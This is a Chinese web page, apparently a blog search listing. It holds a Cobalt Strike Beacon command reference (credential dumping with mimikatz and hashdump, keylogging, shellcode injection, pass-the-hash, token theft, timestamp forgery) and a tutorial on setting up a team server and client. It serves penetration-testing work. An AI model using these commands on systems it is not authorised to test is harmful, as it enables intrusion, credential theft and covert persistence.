        connect                   Connect to a Beacon peerover TCP
        covertvpn                 部署Covert VPN客户端
        cp                        复制文件
        dcsync                    从DC中提取密码哈希
        desktop                   远程VNC
        dllinject                 反射DLL注入进程
        dllload                   使用LoadLibrary将DLL加载到进程中
        download                  下载文件
        downloads                 列出正在进行的文件下载
        drives                    列出目标盘符
        elevate                   尝试提权
       execute                   在目标上执行程序(无输出)
        execute-assembly          在目标上内存中执行本地.NET程序
        exit                      退出beacon
        getprivs                  Enable system privileges oncurrent token
        getsystem                 尝试获取SYSTEM权限
        getuid                    获取用户ID
        hashdump                  转储密码哈希值
        help                      帮助
        inject                    在特定进程中生成会话
        jobkill                   杀死一个后台任务
        jobs                      列出后台任务
        kerberos_ccache_use       从ccache文件中导入票据应用于此会话
        kerberos_ticket_purge     清除当前会话的票据
        kerberos_ticket_use       从ticket文件中导入票据应用于此会话
        keylogger                 键盘记录
        kill                      结束进程
        link                      Connect to a Beacon peerover a named pipe
        logonpasswords            使用mimikatz转储凭据和哈希值
        ls                        列出文件
        make_token                创建令牌以传递凭据
        mimikatz                  运行mimikatz
        mkdir                     创建一个目录
        mode dns                  使用DNS A作为通信通道(仅限DNS beacon)
        mode dns-txt              使用DNS TXT作为通信通道(仅限D beacon)
        mode dns6                 使用DNS AAAA作为通信通道(仅限DNS beacon)
        mode http                 使用HTTP作为通信通道
        mv                        移动文件
        net                       net命令
        note                      备注      
        portscan                  进行端口扫描
        powerpick                 通过Unmanaged PowerShell执行命令
        powershell                通过powershell.exe执行命令
        powershell-import         导入powershell脚本
        ppid                      Set parent PID forspawned post-ex jobs
        ps                        显示进程列表
        psexec                    Use a service to spawn asession on a host
        psexec_psh                Use PowerShell to spawn asession on a host
        psinject                  在特定进程中执行PowerShell命令
        pth                       使用Mimikatz进行传递哈希
        pwd                       当前目录位置
        reg                       Query the registry
        rev2self                  恢复原始令牌
        rm                        删除文件或文件夹
        rportfwd                  端口转发
        run                       在目标上执行程序(返回输出)
        runas                     以另一个用户权限执行程序
        runasadmin                在高权限下执行程序
        runu                      Execute a program underanother PID
        screenshot                屏幕截图
        setenv                    设置环境变量
        shell                     cmd执行命令
        shinject                  将shellcode注入进程
        shspawn                   生成进程并将shellcode注入其中
        sleep                     设置睡眠延迟时间
        socks                     启动SOCKS4代理
        socks stop                停止SOCKS4
        spawn                     Spawn a session
        spawnas                   Spawn a session as anotheruser
        spawnto                  Set executable tospawn processes into
        spawnu                    Spawn a session underanother PID
        ssh                       使用ssh连接远程主机
        ssh-key                   使用密钥连接远程主机
        steal_token               从进程中窃取令牌
        timestomp                 将一个文件时间戳应用到另一个文件
        unlink                    Disconnect from parentBeacon
        upload                    上传文件
        wdigest                   使用mimikatz转储明文凭据
        winrm                     使用WinRM在主机上生成会话
        wmi                       使用WMI在主机上生成会话
        argue                      进程参数欺骗
    

    更多web安全工具、存在漏洞的网站搭建源码、渗透测试思路,收集整理在知识星球。
    在这里插入图片描述

    展开全文
  • Ladon 7.7 For Cobalt Strike 中文GUI 信息收集/存活主机/服务识别/端口扫描 高危漏洞检测 网络服务密码爆破 远程执行/横向移动 MSF、NC联动/一键反弹 程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描...
  • CobaltStrike 部署

    2021-02-05 10:51:05
    CobaltStrike 部署CobaltStrike 文件团队服务器Cobalt Strike Client 基于java的渗透测试神器,非常适合团队协同作战,多个人可以同时连接到一个团队服务器上,共享目标资源与目标信息和sessions,可模拟APT做模拟...


    基于java的渗透测试神器,非常适合团队协同作战,多个人可以同时连接到一个团队服务器上,共享目标资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。

    CobaltStrike 文件

    在这里插入图片描述

    团队服务器

    团队服务器最好运行在Linux平台上,服务端的关键文件是teamservercobaltstrike.jar.

    1. 安装Java 1.8
      默认的JDK 版本太低 不能执行
      Exception in thread “main” java.lang.UnsupportedClassVersionError: common/Authorization : Unsupported major.minor version 52.0
      java.lang.UnsupportedClassVersionError
    2. 启动团队服务./teamserver 192.168.1.121 12345
     ./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD] 
    # 执行./teamserver的时候,有两个必要参数和两个可选参数
    # <host> :是团队服务器的 IP 地址。Cobalt Strike 使用此值作为其默认的服务器主机
    # <password> :是团队成员用于将 Cobalt Strike 客户端连接到团队服务器的密码
    # [/path/to/c2.profile] :指定 Malleable C2 通信配置文件
    # [YYYY-MM-DD] :此参数指定以 YYYY-MM-DD 为格式的结束日期。团队服务器会将此结束日期嵌入其生成的每个 Beacon 中。 Beacon 有效负载将拒绝在此结束日期或之后运行。如果 Beacon 有效载荷在此结束日期或之后唤醒,它也将被运行退出。
    

    teamserver
    当团队服务器启动时,它将发布团队服务器 SSL 证书的 SHA256 哈希值。您应 该将此哈希值分发给您的团队成员。当您的团队成员连接时, Cobalt Strike 客户端会在向团队服务器进行身份验证之前询问是否验证此哈希。这是防止中间人攻击的重要保护。

    Cobalt Strike Client

    1. 使用Cobalt Strike 客户端(cobaltstrike.jar)连接到团队服务器 ,如果是windows 系统 可以直接使用 cobaltstrike.bat 来启动客户端(加载了中文等信息). 用户名随意(只为区分团队中的成员),密码是12345。(./teamserver 192.168.1.121 12345
    java -jar cobaltstrike.jar
    

    cobaltstrike
    cobaltstrike client

    展开全文
  • 内网神器-cobaltstrike的安装使用以及折腾踩坑填坑记录 文章目录内网神器-cobaltstrike的安装使用以及折腾踩坑填坑记录一、Cobalt Strike是什么?二、安装部署2.1. 架构2.2. 部署条件2.读入数据总结 一、Cobalt ...
  • Cobalt Strike4.1.zip

    2021-08-10 09:19:06
    最新版Cobalt Strike4.1
  • Cobalt Strike的使用

    万次阅读 2018-11-16 21:35:45
    【下列实验有一个前提就是对方要能ping通你搭的服务器。】 ... Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、offic...
  • Cobalt Strike 作为一款协同APT工具,已成为了渗透测试中不可缺少的利器,文章基于Cobalt Strike 4.3进行介绍, 文章目录二、常用操作(一) 创建监听器(二) 生成payload(三) 管理节点 二、常用操作 (一) 创建监听器 ...
  • Cobalt Strike K8破解版 Cobalt Strike 4.4 Cobalt Strike 4.3 Cobalt Strike 3.13 Cobalt Strike 3.12 1.内置Windows版TeamServer.exe启动器 2.内置巨龙拉冬Ladon7.2 巨龙拉冬插件 K8版默认集成Ladon7.2,可自行替换...
  • Cobalt Strike 4.0-渗透攻击-First day

    千次阅读 多人点赞 2020-10-30 20:12:47
    Cobalt Strike 4.0-渗透攻击-First day(dayu) ** 作者:大余 时间:2020-10-30 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里...
  •   先看官网,地址https://www.cobaltstrike.com/   访问官网,点击Download,填写资料申请试用,竟然不支持中国地区试用   trials are only available to users in the United States, Australia, Canada, ...

空空如也

空空如也

1 2 3 4 5 ... 8
收藏数 154
精华内容 61
关键字:

cobaltstrike中文